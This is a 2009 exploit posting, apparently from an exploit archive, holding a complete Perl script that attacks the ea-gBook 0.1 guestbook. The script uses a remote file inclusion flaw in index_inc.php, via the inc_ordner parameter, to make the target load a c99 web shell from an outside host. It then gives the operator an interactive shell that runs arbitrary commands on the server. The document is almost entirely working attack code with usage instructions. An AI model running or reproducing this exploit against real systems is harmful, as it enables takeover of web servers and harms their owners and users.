ea-gBook 0.1 Remote Command Execution with RFI (c99) Exploit
来源:http://www.soh-crew.it.tt 作者:bd0rk 发布时间:2009-02-16
#!/usr/bin/perl #################################################################### # ea-gBook 0.1 Remote Command Execution with RFI (c99) Exploit # Vendor: http://ea-style.de/ # Download: http://ea-style.de/eddy/index.php?action=down_gbook_agb # # Author: bd0rk # Contact: bd0rk[at]hackermail.com # site: http://www.soh-crew.it.tt # # #################################################################### # # # RFI vuln!: /ea-gBook/index_inc.php line 22 # include ($inc_ordner . "config.php"); # ####################################################################
use LWP::UserAgent; use HTTP::Request; use LWP::Simple; use Getopt::Long;
sub clear{ system(($^O eq 'MSWin32') ? 'cls' : 'clear'); }
sub banner { &clear(); print "[x] ea-gBook 0.1 Remote Command Execution with RFI (c99) Exploit\n"; print "[x] by bd0rk\n"; print "[x] bd0rk[at]hackermail[dot]com\n\n"; print "[+] Usage:\n"; print "[+] $0 -vuln \"web+path\" -shell \"shell\"\n"; print "[+] eX: $0 -vuln \"http://www.someone.com/test/\" -shell \"http://someone.com/c99.txt?\"\n\n"; exit(); }
my $options = GetOptions ( 'help!' => \$help, 'vuln=s' => \$vuln, 'shell=s' => \$shell );
&banner unless ($vuln); &banner unless ($shell);
&banner if $banner eq 1;
chomp($vuln); chomp($shell);
while (){
print "[shell]:~\$ "; chomp($cmd=<STDIN>);
if ($cmd eq "exit" || $cmd eq "quit") { exit 0; }
my $ua = LWP::UserAgent->new; $iny="?&act=cmd&cmd=" . $cmd . "&d=/&submit=1&cmd_txt=1"; chomp($iny); my $own = $vuln . "/ea-gBook/index_inc.php?inc_ordner=" . $shell . $iny; chomp($own); my $req = HTTP::Request->new(GET => $own); my $res = $ua->request($req); my $con = $res->content; if ($res->is_success){ print $1,"\n" if ( $con =~ m/readonly> (.*?)\<\/textarea>/mosix); } else { print "[p0c] Exploit failed\n"; exit(1); } }
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